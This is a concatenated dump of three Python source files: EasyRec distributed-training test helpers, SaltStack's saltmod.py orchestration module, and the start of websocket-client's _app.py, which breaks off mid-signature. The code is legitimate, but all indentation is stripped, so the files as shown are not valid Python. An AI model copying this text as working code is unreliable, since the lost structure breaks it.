with open(train_yaml_path, 'r', encoding='utf-8') as _file:
sample = _file.read()
x = yaml.load(sample)
_command = x['app']['command']
if test_export_dir is not None:
_command = _command.replace(pipline_config_path,
test_pipeline_config_path).replace(
'{EXPOERT_DIR}', test_export_dir)
else:
_command = _command.replace(pipline_config_path,
test_pipeline_config_path)
x['app']['command'] = _command
with open(train_yaml_path, 'w', encoding='utf-8') as _file:
yaml.dump(x, _file)
def test_hdfs_train_eval(pipeline_config_path,
train_yaml_path,
test_dir,
process_pipeline_func=None,
hyperparam_str='',
total_steps=2000):
gpus = get_available_gpus()
if len(gpus) > 0:
set_gpu_id(gpus[0])
else:
set_gpu_id(None)
logging.info('testing pipeline config %s' % pipeline_config_path)
logging.info('train_yaml_path %s' % train_yaml_path)
if 'TF_CONFIG' in os.environ:
del os.environ['TF_CONFIG']
pipeline_config = _load_config_for_test(pipeline_config_path, test_dir,
total_steps)
logging.info('model_dir in pipeline_config has been modified')
pipeline_config.train_config.train_distribute = 0
pipeline_config.train_config.num_gpus_per_worker = 1
pipeline_config.train_config.sync_replicas = False
if process_pipeline_func is not None:
assert callable(process_pipeline_func)
pipeline_config = process_pipeline_func(pipeline_config)
config_util.save_pipeline_config(pipeline_config, test_dir)
test_pipeline_config_path = os.path.join(test_dir, 'pipeline.config')
yaml_replace(train_yaml_path, pipeline_config_path, test_pipeline_config_path)
logging.info('test_pipeline_config_path is %s' % test_pipeline_config_path)
train_cmd = 'el_submit -yaml %s' % train_yaml_path
proc = subprocess.Popen(train_cmd.split(), stderr=subprocess.STDOUT)
proc.wait()
if proc.returncode != 0:
logging.error('train %s failed' % test_pipeline_config_path)
logging.error('train_yaml %s failed' % train_yaml_path)
return proc.returncode == 0
def test_hdfs_eval(pipeline_config_path,
eval_yaml_path,
test_dir,
process_pipeline_func=None,
hyperparam_str=''):
gpus = get_available_gpus()
if len(gpus) > 0:
set_gpu_id(gpus[0])
else:
set_gpu_id(None)
logging.info('testing export pipeline config %s' % pipeline_config_path)
logging.info('eval_yaml_path %s' % eval_yaml_path)
if 'TF_CONFIG' in os.environ:
del os.environ['TF_CONFIG']
pipeline_config = _Load_config_for_test_eval(pipeline_config_path)
if process_pipeline_func is not None:
assert callable(process_pipeline_func)
pipeline_config = process_pipeline_func(pipeline_config)
config_util.save_pipeline_config(pipeline_config, test_dir)
test_pipeline_config_path = os.path.join(test_dir, 'pipeline.config')
yaml_replace(eval_yaml_path, pipeline_config_path, test_pipeline_config_path)
logging.info('test_pipeline_config_path is %s' % test_pipeline_config_path)
eval_cmd = 'el_submit -yaml %s' % eval_yaml_path
proc = subprocess.Popen(eval_cmd.split(), stderr=subprocess.STDOUT)
proc.wait()
if proc.returncode != 0:
logging.error('eval %s failed' % test_pipeline_config_path)
logging.error('eval_yaml %s failed' % eval_yaml_path)
return proc.returncode == 0
def test_hdfs_export(pipeline_config_path,
export_yaml_path,
test_dir,
process_pipeline_func=None,
hyperparam_str=''):
gpus = get_available_gpus()
if len(gpus) > 0:
set_gpu_id(gpus[0])
else:
set_gpu_id(None)
logging.info('testing export pipeline config %s' % pipeline_config_path)
logging.info('export_yaml_path %s' % export_yaml_path)
if 'TF_CONFIG' in os.environ:
del os.environ['TF_CONFIG']
pipeline_config = _Load_config_for_test_eval(pipeline_config_path)
if process_pipeline_func is not None:
assert callable(process_pipeline_func)
pipeline_config = process_pipeline_func(pipeline_config)
config_util.save_pipeline_config(pipeline_config, test_dir)
test_pipeline_config_path = os.path.join(test_dir, 'pipeline.config')
test_export_path = os.path.join(test_dir, 'export_dir')
yaml_replace(export_yaml_path, pipeline_config_path,
test_pipeline_config_path, test_export_path)
logging.info('test_pipeline_config_path is %s' % test_pipeline_config_path)
eval_cmd = 'el_submit -yaml %s' % export_yaml_path
proc = subprocess.Popen(eval_cmd.split(), stderr=subprocess.STDOUT)
proc.wait()
if proc.returncode != 0:
logging.error('export %s failed' % test_pipeline_config_path)
logging.error('export_yaml %s failed' % export_yaml_path)
return proc.returncode == 0
def _ports_in_use(ports):
ports_str = ''
for i, port in enumerate(ports):
if i > 0:
ports_str += '|'
ports_str += '0.0.0.0:%d|127.0.0.1:%d' % (port, port)
stat, output = getstatusoutput('netstat -tlnp | grep -E %s' % ports_str)
return stat == 0
def _get_ports(num_worker):
port_base = int(os.environ.get('PORT_BASE', 10000))
num_try = 10
for i in range(num_try):
ports = np.random.randint(port_base, port_base + 5000, size=num_worker)
if not _ports_in_use(ports):
return ports
logging.info('ports %s in use, retry...' % ports)
def _ps_worker_train(pipeline_config_path,
test_dir,
num_worker,
num_evaluator=0):
gpus = get_available_gpus()
# not enough gpus, run on cpu only
if len(gpus) < num_worker:
gpus = [None] * num_worker
ports = _get_ports(num_worker + 1)
chief_or_master = 'master' if num_evaluator == 0 else 'chief'
cluster = {
chief_or_master: ['localhost:%d' % ports[0]],
'worker': ['localhost:%d' % ports[i] for i in range(1, num_worker)],
'ps': ['localhost:%d' % ports[-1]]
}
tf_config = {'cluster': cluster}
procs = {}
tf_config['task'] = {'type': chief_or_master, 'index': 0}
os.environ['TF_CONFIG'] = json.dumps(tf_config)
set_gpu_id(gpus[0])
train_cmd = 'python -m easy_rec.python.train_eval --pipeline_config_path %s' % pipeline_config_path
procs[chief_or_master] = run_cmd(
train_cmd, '%s/log_%s.txt' % (test_dir, chief_or_master))
tf_config['task'] = {'type': 'ps', 'index': 0}
os.environ['TF_CONFIG'] = json.dumps(tf_config)
set_gpu_id('')
procs['ps'] = run_cmd(train_cmd, '%s/log_%s.txt' % (test_dir, 'ps'))
for idx in range(num_worker - 1):
tf_config['task'] = {'type': 'worker', 'index': idx}
os.environ['TF_CONFIG'] = json.dumps(tf_config)
set_gpu_id(gpus[idx + 1])
worker_name = 'worker_%d' % idx
procs[worker_name] = run_cmd(train_cmd,
'%s/log_%s.txt' % (test_dir, worker_name))
if num_evaluator > 0:
tf_config['task'] = {'type': 'evaluator', 'index': 0}
os.environ['TF_CONFIG'] = json.dumps(tf_config)
set_gpu_id('')
procs['evaluator'] = run_cmd(train_cmd,
'%s/log_%s.txt' % (test_dir, 'evaluator'))
return procs
def _multi_worker_mirror_train(pipeline_config_path, test_dir, num_worker):
gpus = get_available_gpus()
# not enough gpus, run on cpu only
if len(gpus) < num_worker:
gpus = [None] * num_worker
ports = _get_ports(num_worker)
tf_config = {
'cluster': {
'worker': ['localhost:%d' % ports[i] for i in range(num_worker)]
}
}
procs = {}
train_cmd = 'python -m easy_rec.python.train_eval --pipeline_config_path %s' % pipeline_config_path
for idx in range(num_worker):
tf_config['task'] = {'type': 'worker', 'index': idx}
os.environ['TF_CONFIG'] = json.dumps(tf_config)
set_gpu_id(gpus[idx])
worker_name = 'worker_%d' % idx
procs[worker_name] = run_cmd(train_cmd,
'%s/log_%s.txt' % (test_dir, worker_name))
return procs
def test_distributed_train_eval(pipeline_config_path,
test_dir,
total_steps=50,
num_evaluator=0):
logging.info('testing pipeline config %s' % pipeline_config_path)
pipeline_config = _load_config_for_test(pipeline_config_path, test_dir,
total_steps)
train_config = pipeline_config.train_config
config_util.save_pipeline_config(pipeline_config, test_dir)
test_pipeline_config_path = os.path.join(test_dir, 'pipeline.config')
task_failed = None
procs = None
try:
if train_config.train_distribute == DistributionStrategy.NoStrategy:
num_worker = 2
procs = _ps_worker_train(test_pipeline_config_path, test_dir, num_worker,
num_evaluator)
elif train_config.train_distribute == DistributionStrategy.MultiWorkerMirroredStrategy:
num_worker = 2
procs = _multi_worker_mirror_train(test_pipeline_config_path, test_dir,
num_worker)
else:
raise NotImplementedError
# print proc info
assert len(procs) > 0, 'processes are empty'
for k, proc in procs.items():
logging.info('%s pid: %d' % (k, proc.pid))
task_finish_cnt = 0
task_has_finished = {k: False for k in procs.keys()}
while True:
for k, proc in procs.items():
if proc.poll() is None:
if task_failed is not None:
logging.error('task %s failed, %s quit' % (task_failed, k))
proc.terminate()
if k != 'ps':
task_has_finished[k] = True
task_finish_cnt += 1
logging.info('task_finish_cnt %d' % task_finish_cnt)
else:
if not task_has_finished[k]:
# process quit by itself
if k != 'ps':
task_finish_cnt += 1
task_has_finished[k] = True
logging.info('task_finish_cnt %d' % task_finish_cnt)
if proc.returncode != 0:
logging.error('%s failed' % k)
task_failed = k
else:
logging.info('%s run successfuly' % k)
if task_finish_cnt >= num_worker:
break
time.sleep(1)
except Exception as e:
logging.error('Exception: ' + str(e))
raise e
finally:
if procs is not None:
for k, proc in procs.items():
if proc.poll() is None:
logging.info('terminate %s' % k)
proc.terminate()
if task_failed is not None:
logging.error('train %s failed' % pipeline_config_path)
return task_failed is None
|
saltmod.py | # -*- coding: utf-8 -*-
'''
Control the Salt command interface
==================================
This state is intended for use from the Salt Master. It provides access to
sending commands down to minions as well as access to executing master-side
modules. These state functions wrap Salt's :ref:`Python API <python-api>`.
.. versionadded: 2016.11.0
Support for masterless minions was added to the ``salt.state`` function,
so they can run orchestration sls files. This is particularly useful when
the rendering of a state is dependent on the execution of another state.
Orchestration will render and execute each orchestration block
independently, while honoring requisites to ensure the states are applied
in the correct order.
.. seealso:: More Orchestrate documentation
* :ref:`Full Orchestrate Tutorial <orchestrate-runner>`
* :py:func:`The Orchestrate runner <salt.runners.state.orchestrate>`
'''
from __future__ import absolute_import, unicode_literals, print_function
# Import python libs
import fnmatch
import logging
import sys
import threading
import time
# Import salt libs
import salt.syspaths
import salt.exceptions
import salt.output
import salt.utils.data
import salt.utils.event
from salt.ext import six
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = 'salt'
def __virtual__():
'''
Named salt
'''
return __virtualname__
def _fire_args(tag_data):
try:
salt.utils.event.fire_args(__opts__,
__orchestration_jid__,
tag_data,
'run')
except NameError:
log.debug(
'Unable to fire args event due to missing __orchestration_jid__'
)
def _parallel_map(func, inputs):
'''
Applies a function to each element of a list, returning the resulting list.
A separate thread is created for each element in the input list and the
passed function is called for each of the elements. When all threads have
finished execution a list with the results corresponding to the inputs is
returned.
If one of the threads fails (because the function throws an exception),
that exception is reraised. If more than one thread fails, the exception
from the first thread (according to the index of the input element) is
reraised.
func:
function that is applied on each input element.
inputs:
list of elements that shall be processed. The length of this list also
defines the number of threads created.
'''
outputs = len(inputs) * [None]
errors = len(inputs) * [None]
def create_thread(index):
def run_thread():
try:
outputs[index] = func(inputs[index])
except: # pylint: disable=bare-except
errors[index] = sys.exc_info()
thread = threading.Thread(target=run_thread)
thread.start()
return thread
threads = list(six.moves.map(create_thread, six.moves.range(len(inputs))))
for thread in threads:
thread.join()
for error in errors:
if error is not None:
exc_type, exc_value, exc_traceback = error
six.reraise(exc_type, exc_value, exc_traceback)
return outputs
def state(name,
tgt,
ssh=False,
tgt_type='glob',
ret='',
ret_config=None,
ret_kwargs=None,
highstate=None,
sls=None,
top=None,
saltenv=None,
test=None,
pillar=None,
pillarenv=None,
expect_minions=True,
fail_minions=None,
allow_fail=0,
concurrent=False,
timeout=None,
batch=None,
queue=False,
subset=None,
orchestration_jid=None,
**kwargs):
'''
Invoke a state run on a given target
name
An arbitrary name used to track the state execution
tgt
The target specification for the state run.
.. versionadded: 2016.11.0
Masterless support: When running on a masterless minion, the ``tgt``
is ignored and will always be the local minion.
tgt_type
The target type to resolve, defaults to ``glob``
ret
Optionally set a single or a list of returners to use
ret_config
Use an alternative returner configuration
ret_kwargs
Override individual returner configuration items
highstate
Defaults to None, if set to True the target systems will ignore any
sls references specified in the sls option and call state.highstate
on the targeted minions
top
Should be the name of a top file. If set state.top is called with this
top file instead of state.sls.
sls
A group of sls files to execute. This can be defined as a single string
containing a single sls file, or a list of sls files
test
Pass ``test=true`` or ``test=false`` through to the state function. This
can be used to overide a test mode set in the minion's config file. If
left as the default of None and the 'test' mode is supplied on the
command line, that value is passed instead.
pillar
Pass the ``pillar`` kwarg through to the state function
pillarenv
The pillar environment to grab pillars from
.. versionadded:: 2017.7.0
saltenv
The default salt environment to pull sls files from
ssh
Set to `True` to use the ssh client instead of the standard salt client
roster
In the event of using salt-ssh, a roster system can be set
expect_minions
An optional boolean for failing if some minions do not respond
fail_minions
An optional list of targeted minions where failure is an option
allow_fail
Pass in the number of minions to allow for failure before setting
the result of the execution to False
concurrent
Allow multiple state runs to occur at once.
WARNING: This flag is potentially dangerous. It is designed
for use when multiple state runs can safely be run at the same
Do not use this flag for performance optimization.
queue
Pass ``queue=true`` through to the state function
batch
Execute the command :ref:`in batches <targeting-batch>`. E.g.: ``10%``.
.. versionadded:: 2016.3.0
subset
Number of minions from the targeted set to randomly use
.. versionadded:: 2017.7.0
Examples:
Run a list of sls files via :py:func:`state.sls <salt.state.sls>` on target
minions:
.. code-block:: yaml
webservers:
salt.state:
- tgt: 'web*'
- sls:
- apache
- django
- core
- saltenv: prod
Run a full :py:func:`state.highstate <salt.state.highstate>` on target
mininons.
.. code-block:: yaml
databases:
salt.state:
- tgt: role:database
- tgt_type: grain
- highstate: True
'''
cmd_kw = {'arg': [], 'kwarg': {}, 'ret': ret, 'timeout': timeout}
if ret_config:
cmd_kw['ret_config'] = ret_config
if ret_kwargs:
cmd_kw['ret_kwargs'] = ret_kwargs
state_ret = {'name': name,
'changes': {},
'comment': '',
'result': True}
try:
allow_fail = int(allow_fail)
except ValueError:
state_ret['result'] = False
state_ret['comment'] = 'Passed invalid value for \'allow_fail\', must be an int'
return state_ret
cmd_kw['tgt_type'] = tgt_type
cmd_kw['ssh'] = ssh
cmd_kw['expect_minions'] = expect_minions
if highstate:
fun = 'state.highstate'
elif top:
fun = 'state.top'
cmd_kw['arg'].append(top)
elif sls:
fun = 'state.sls'
if isinstance(sls, list):
sls = ','.join(sls)
cmd_kw['arg'].append(sls)
else:
state_ret['comment'] = 'No highstate or sls specified, no execution made'
state_ret['result'] = False
return state_ret
if test is not None or __opts__.get('test'):
cmd_kw['kwarg']['test'] = test if test is not None else __opts__.get('test')
if pillar:
cmd_kw['kwarg']['pillar'] = pillar
if pillarenv is not None:
cmd_kw['kwarg']['pillarenv'] = pillarenv
if saltenv is not None:
cmd_kw['kwarg']['saltenv'] = saltenv
cmd_kw['kwarg']['queue'] = queue
if isinstance(concurrent, bool):
cmd_kw['kwarg']['concurrent'] = concurrent
else:
state_ret['comment'] = ('Must pass in boolean for value of \'concurrent\'')
state_ret['result'] = False
return state_ret
if batch is not None:
cmd_kw['batch'] = six.text_type(batch)
if subset is not None:
cmd_kw['subset'] = subset
masterless = __opts__['__role'] == 'minion' and \
__opts__['file_client'] == 'local'
if not masterless:
_fire_args({'type': 'state', 'tgt': tgt, 'name': name, 'args': cmd_kw})
cmd_ret = __salt__['saltutil.cmd'](tgt, fun, **cmd_kw)
else:
if top:
cmd_kw['topfn'] = ''.join(cmd_kw.pop('arg'))
elif sls:
cmd_kw['mods'] = cmd_kw.pop('arg')
cmd_kw.update(cmd_kw.pop('kwarg'))
tmp_ret = __salt__[fun](**cmd_kw)
cmd_ret = {__opts__['id']: {
'ret': tmp_ret,
'out': tmp_ret.get('out', 'highstate') if
isinstance(tmp_ret, dict) else 'highstate'
}}
try:
state_ret['__jid__'] = cmd_ret[next(iter(cmd_ret))]['jid']
except (StopIteration, KeyError):
pass
changes = {}
fail = set()
no_change = set()
if fail_minions is None:
fail_minions = ()
elif isinstance(fail_minions, six.string_types):
fail_minions = [minion.strip() for minion in fail_minions.split(',')]
elif not isinstance(fail_minions, list):
state_ret.setdefault('warnings', []).append(
'\'fail_minions\' needs to be a list or a comma separated '
'string. Ignored.'
)
fail_minions = ()
if not cmd_ret and expect_minions:
state_ret['result'] = False
state_ret['comment'] = 'No minions returned'
return state_ret
for minion, mdata in six.iteritems(cmd_ret):
if mdata.get('out', '') != 'highstate':
log.warning('Output from salt state not highstate')
m_ret = False
if 'return' in mdata and 'ret' not in mdata:
mdata['ret'] = mdata.pop('return')
m_state = True
if mdata.get('failed', False):
m_state = False
else:
try:
m_ret = mdata['ret']
except KeyError:
m_state = False
if m_state:
m_state = __utils__['state.check_result'](m_ret, recurse=True)
if not m_state:
if minion not in fail_minions:
fail.add(minion)
changes[minion] = m_ret
continue
try:
for state_item in six.itervalues(m_ret):
if isinstance(state_item, dict):
if 'changes' in state_item and state_item['changes']:
changes[minion] = m_ret
break
else:
no_change.add(minion)
except AttributeError:
log.error("m_ret did not have changes %s %s", type(m_ret), m_ret)
no_change.add(minion)
if changes:
state_ret['changes'] = {'out': 'highstate', 'ret': changes}
if len(fail) > allow_fail:
state_ret['result'] = False
state_ret['comment'] = 'Run failed on minions: {0}'.format(', '.join(fail))
else:
state_ret['comment'] = 'States ran successfully.'
if changes:
state_ret['comment'] += ' Updating {0}.'.format(', '.join(changes))
if no_change:
state_ret['comment'] += ' No changes made to {0}.'.format(', '.join(no_change))
if test or __opts__.get('test'):
if state_ret['changes'] and state_ret['result'] is True:
# Test mode with changes is the only case where result should ever be none
state_ret['result'] = None
return state_ret
def function(
name,
tgt,
ssh=False,
tgt_type='glob',
ret='',
ret_config=None,
ret_kwargs=None,
expect_minions=False,
fail_minions=None,
fail_function=None,
arg=None,
kwarg=None,
timeout=None,
batch=None,
subset=None):
'''
Execute a single module function on a remote minion via salt or salt-ssh
name
The name of the function to run, aka cmd.run or pkg.install
tgt
The target specification, aka '*' for all minions
tgt_type
The target type, defaults to ``glob``
arg
The list of arguments to pass into the function
kwarg
The dict (not a list) of keyword arguments to pass into the function
ret
Optionally set a single or a list of returners to use
ret_config
Use an alternative returner configuration
ret_kwargs
Override individual returner configuration items
expect_minions
An optional boolean for failing if some minions do not respond
fail_minions
An optional list of targeted minions where failure is an option
fail_function
An optional string that points to a salt module that returns True or False
based on the returned data dict for individual minions
ssh
Set to `True` to use the ssh client instead of the standard salt client
batch
Execute the command :ref:`in batches <targeting-batch>`. E.g.: ``10%``.
subset
Number of minions from the targeted set to randomly use
.. versionadded:: 2017.7.0
'''
func_ret = {'name': name,
'changes': {},
'comment': '',
'result': True}
if kwarg is None:
kwarg = {}
if isinstance(arg, six.string_types):
func_ret['warnings'] = ['Please specify \'arg\' as a list, not a string. '
'Modifying in place, but please update SLS file '
'to remove this warning.']
arg = arg.split()
cmd_kw = {'arg': arg or [], 'kwarg': kwarg, 'ret': ret, 'timeout': timeout}
if batch is not None:
cmd_kw['batch'] = six.text_type(batch)
if subset is not None:
cmd_kw['subset'] = subset
cmd_kw['tgt_type'] = tgt_type
cmd_kw['ssh'] = ssh
cmd_kw['expect_minions'] = expect_minions
cmd_kw['_cmd_meta'] = True
if ret_config:
cmd_kw['ret_config'] = ret_config
if ret_kwargs:
cmd_kw['ret_kwargs'] = ret_kwargs
fun = name
if __opts__['test'] is True:
func_ret['comment'] = (
'Function {0} will be executed on target {1} as test={2}'
).format(fun, tgt, six.text_type(False))
func_ret['result'] = None
return func_ret
try:
_fire_args({'type': 'function', 'tgt': tgt, 'name': name, 'args': cmd_kw})
cmd_ret = __salt__['saltutil.cmd'](tgt, fun, **cmd_kw)
except Exception as exc:
func_ret['result'] = False
func_ret['comment'] = six.text_type(exc)
return func_ret
try:
func_ret['__jid__'] = cmd_ret[next(iter(cmd_ret))]['jid']
except (StopIteration, KeyError):
pass
changes = {}
fail = set()
if fail_minions is None:
fail_minions = ()
elif isinstance(fail_minions, six.string_types):
fail_minions = [minion.strip() for minion in fail_minions.split(',')]
elif not isinstance(fail_minions, list):
func_ret.setdefault('warnings', []).append(
'\'fail_minions\' needs to be a list or a comma separated '
'string. Ignored.'
)
fail_minions = ()
for minion, mdata in six.iteritems(cmd_ret):
m_ret = False
if mdata.get('retcode'):
func_ret['result'] = False
fail.add(minion)
if mdata.get('failed', False):
m_func = False
else:
if 'return' in mdata and 'ret' not in mdata:
mdata['ret'] = mdata.pop('return')
m_ret = mdata['ret']
m_func = (not fail_function and True) or __salt__[fail_function](m_ret)
if m_ret is False:
m_func = False
if not m_func:
if minion not in fail_minions:
fail.add(minion)
changes[minion] = m_ret
if not cmd_ret:
func_ret['result'] = False
func_ret['command'] = 'No minions responded'
else:
if changes:
func_ret['changes'] = {'out': 'highstate', 'ret': changes}
if fail:
func_ret['result'] = False
func_ret['comment'] = 'Running function {0} failed on minions: {1}'.format(name, ', '.join(fail))
else:
func_ret['comment'] = 'Function ran successfully.'
if changes:
func_ret['comment'] += ' Function {0} ran on {1}.'.format(name, ', '.join(changes))
return func_ret
def wait_for_event(
name,
id_list,
event_id='id',
timeout=300,
node='master'):
'''
Watch Salt's event bus and block until a condition is met
.. versionadded:: 2014.7.0
name
An event tag to watch for; supports Reactor-style globbing.
id_list
A list of event identifiers to watch for -- usually the minion ID. Each
time an event tag is matched the event data is inspected for
``event_id``, if found it is removed from ``id_list``. When ``id_list``
is empty this function returns success.
event_id : id
The name of a key in the event data. Default is ``id`` for the minion
ID, another common value is ``name`` for use with orchestrating
salt-cloud events.
timeout : 300
The maximum time in seconds to wait before failing.
The following example blocks until all the listed minions complete a
restart and reconnect to the Salt master:
.. code-block:: yaml
reboot_all_minions:
salt.function:
- name: system.reboot
- tgt: '*'
wait_for_reboots:
salt.wait_for_event:
- name: salt/minion/*/start
- id_list:
- jerry
- stuart
- dave
- phil
- kevin
- mike
- require:
- salt: reboot_all_minions
'''
ret = {'name': name, 'changes': {}, 'comment': '', 'result': False}
if __opts__.get('test'):
ret['comment'] = \
'Orchestration would wait for event \'{0}\''.format(name)
ret['result'] = None
return ret
sevent = salt.utils.event.get_event(
node,
__opts__['sock_dir'],
__opts__['transport'],
opts=__opts__,
listen=True)
del_counter = 0
starttime = time.time()
timelimit = starttime + timeout
while True:
event = sevent.get_event(full=True)
is_timedout = time.time() > timelimit
if event is None and not is_timedout:
log.trace("wait_for_event: No event data; waiting.")
continue
elif event is None and is_timedout:
ret['comment'] = 'Timeout value reached.'
return ret
if fnmatch.fnmatch(event['tag'], name):
val = event['data'].get(event_id)
if val is None and 'data' in event['data']:
val = event['data']['data'].get(event_id)
if val is not None:
try:
val_idx = id_list.index(val)
except ValueError:
log.trace("wait_for_event: Event identifier '%s' not in "
"id_list; skipping.", event_id)
else:
del id_list[val_idx]
del_counter += 1
minions_seen = ret['changes'].setdefault('minions_seen', [])
minions_seen.append(val)
log.debug("wait_for_event: Event identifier '%s' removed "
"from id_list; %s items remaining.",
val, len(id_list))
else:
log.trace("wait_for_event: Event identifier '%s' not in event "
"'%s'; skipping.", event_id, event['tag'])
else:
log.debug("wait_for_event: Skipping unmatched event '%s'",
event['tag'])
if len(id_list) == 0:
ret['result'] = True
ret['comment'] = 'All events seen in {0} seconds.'.format(
time.time() - starttime)
return ret
if is_timedout:
ret['comment'] = 'Timeout value reached.'
return ret
def runner(name, **kwargs):
'''
Execute a runner module on the master
.. versionadded:: 2014.7.0
name
The name of the function to run
kwargs
Any keyword arguments to pass to the runner function
.. code-block:: yaml
run-manage-up:
salt.runner:
- name: manage.up
'''
try:
jid = __orchestration_jid__
except NameError:
log.debug(
'Unable to fire args event due to missing __orchestration_jid__'
)
jid = None
if __opts__.get('test', False):
ret = {
'name': name,
'result': None,
'changes': {},
'comment': "Runner function '{0}' would be executed.".format(name)
}
return ret
out = __salt__['saltutil.runner'](name,
__orchestration_jid__=jid,
__env__=__env__,
full_return=True,
**kwargs)
runner_return = out.get('return')
if isinstance(runner_return, dict) and 'Error' in runner_return:
out['success'] = False
success = out.get('success', True)
ret = {'name': name,
'changes': {'return': runner_return},
'result': success}
ret['comment'] = "Runner function '{0}' {1}.".format(
name,
'executed' if success else 'failed',
)
ret['__orchestration__'] = True
if 'jid' in out:
ret['__jid__'] = out['jid']
return ret
def parallel_runners(name, runners):
'''
Executes multiple runner modules on the master in parallel.
.. versionadded:: 2017.x.0 (Nitrogen)
A separate thread is spawned for each runner. This state is intended to be
used with the orchestrate runner in place of the ``saltmod.runner`` state
when different tasks should be run in parallel. In general, Salt states are
not safe when used concurrently, so ensure that they are used in a safe way
(e.g. by only targeting separate minions in parallel tasks).
name:
name identifying this state. The name is provided as part of the
output, but not used for anything else.
runners:
list of runners that should be run in parallel. Each element of the
list has to be a dictionary. This dictionary's name entry stores the
name of the runner function that shall be invoked. The optional kwarg
entry stores a dictionary of named arguments that are passed to the
runner function.
.. code-block:: yaml
parallel-state:
salt.parallel_runners:
- runners:
my_runner_1:
- name: state.orchestrate
- kwarg:
mods: orchestrate_state_1
my_runner_2:
- name: state.orchestrate
- kwarg:
mods: orchestrate_state_2
'''
# For the sake of consistency, we treat a single string in the same way as
# a key without a value. This allows something like
# salt.parallel_runners:
# - runners:
# state.orchestrate
# Obviously, this will only work if the specified runner does not need any
# arguments.
if isinstance(runners, six.string_types):
runners = {runners: [{name: runners}]}
# If the runners argument is not a string, it must be a dict. Everything
# else is considered an error.
if not isinstance(runners, dict):
return {
'name': name,
'result': False,
'changes': {},
'comment': 'The runners parameter must be a string or dict.'
}
# The configuration for each runner is given as a list of key-value pairs.
# This is not very useful for what we want to do, but it is the typical
# style used in Salt. For further processing, we convert each of these
# lists to a dict. This also makes it easier to check whether a name has
# been specified explicitly.
for runner_id, runner_config in six.iteritems(runners):
if runner_config is None:
runner_config = {}
else:
runner_config = salt.utils.data.repack_dictlist(runner_config)
if 'name' not in runner_config:
runner_config['name'] = runner_id
runners[runner_id] = runner_config
try:
jid = __orchestration_jid__
except NameError:
log.debug(
'Unable to fire args event due to missing __orchestration_jid__')
jid = None
def call_runner(runner_config):
return __salt__['saltutil.runner'](runner_config['name'],
__orchestration_jid__=jid,
__env__=__env__,
full_return=True,
**(runner_config.get('kwarg', {})))
try:
outputs = _parallel_map(call_runner, list(six.itervalues(runners)))
except salt.exceptions.SaltException as exc:
return {
'name': name,
'result': False,
'success': False,
'changes': {},
'comment': 'One of the runners raised an exception: {0}'.format(
exc)
}
# We bundle the results of the runners with the IDs of the runners so that
# we can easily identify which output belongs to which runner. At the same
# time we exctract the actual return value of the runner (saltutil.runner
# adds some extra information that is not interesting to us).
outputs = {
runner_id: out['return']for runner_id, out in
six.moves.zip(six.iterkeys(runners), outputs)
}
# If each of the runners returned its output in the format compatible with
# the 'highstate' outputter, we can leverage this fact when merging the
# outputs.
highstate_output = all(
[out.get('outputter', '') == 'highstate' and 'data' in out for out in
six.itervalues(outputs)]
)
# The following helper function is used to extract changes from highstate
# output.
def extract_changes(obj):
if not isinstance(obj, dict):
return {}
elif 'changes' in obj:
if (isinstance(obj['changes'], dict)
and obj['changes'].get('out', '') == 'highstate'
and 'ret' in obj['changes']):
return obj['changes']['ret']
else:
return obj['changes']
else:
found_changes = {}
for key, value in six.iteritems(obj):
change = extract_changes(value)
if change:
found_changes[key] = change
return found_changes
if highstate_output:
failed_runners = [runner_id for runner_id, out in
six.iteritems(outputs) if
out['data'].get('retcode', 0) != 0]
all_successful = not failed_runners
if all_successful:
comment = 'All runner functions executed successfully.'
else:
runner_comments = [
'Runner {0} failed with return value:\n{1}'.format(
runner_id,
salt.output.out_format(outputs[runner_id],
'nested',
__opts__,
nested_indent=2)
) for runner_id in failed_runners
]
comment = '\n'.join(runner_comments)
changes = {}
for runner_id, out in six.iteritems(outputs):
runner_changes = extract_changes(out['data'])
if runner_changes:
changes[runner_id] = runner_changes
else:
failed_runners = [runner_id for runner_id, out in
six.iteritems(outputs) if
out.get('exit_code', 0) != 0]
all_successful = not failed_runners
if all_successful:
comment = 'All runner functions executed successfully.'
else:
if len(failed_runners) == 1:
comment = 'Runner {0} failed.'.format(failed_runners[0])
else:
comment =\
'Runners {0} failed.'.format(', '.join(failed_runners))
changes = {'ret': {
runner_id: out for runner_id, out in six.iteritems(outputs)
}}
ret = {
'name': name,
'result': all_successful,
'changes': changes,
'comment': comment
}
# The 'runner' function includes out['jid'] as '__jid__' in the returned
# dict, but we cannot do this here because we have more than one JID if
# we have more than one runner.
return ret
def wheel(name, **kwargs):
'''
Execute a wheel module on the master
.. versionadded:: 2014.7.0
name
The name of the function to run
kwargs
Any keyword arguments to pass to the wheel function
.. code-block:: yaml
accept_minion_key:
salt.wheel:
- name: key.accept
- match: frank
'''
ret = {'name': name, 'result': False, 'changes': {}, 'comment': ''}
try:
jid = __orchestration_jid__
except NameError:
log.debug(
'Unable to fire args event due to missing __orchestration_jid__'
)
jid = None
if __opts__.get('test', False):
ret['result'] = None,
ret['changes'] = {}
ret['comment'] = "Wheel function '{0}' would be executed.".format(name)
return ret
out = __salt__['saltutil.wheel'](name,
__orchestration_jid__=jid,
__env__=__env__,
**kwargs)
wheel_return = out.get('return')
if isinstance(wheel_return, dict) and 'Error' in wheel_return:
out['success'] = False
success = out.get('success', True)
ret = {'name': name,
'changes': {'return': wheel_return},
'result': success}
ret['comment'] = "Wheel function '{0}' {1}.".format(
name,
'executed' if success else 'failed',
)
ret['__orchestration__'] = True
if 'jid' in out:
ret['__jid__'] = out['jid']
return ret
|
_app.py | """
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1335 USA
"""
"""
WebSocketApp provides higher level APIs.
"""
import threading
import time
import traceback
import sys
import select
import six
from ._core import WebSocket, getdefaulttimeout
from ._exceptions import *
from ._logging import *
from websocket._abnf import ABNF
__all__ = ["WebSocketApp"]
class WebSocketApp(object):
"""
Higher level of APIs are provided.
The interface is like JavaScript WebSocket object.
"""
def __init__(self, url, header=[],
on_open=None, on_message=None, on_error=None,
on_close=None, on_ping=None, on_pong=None,
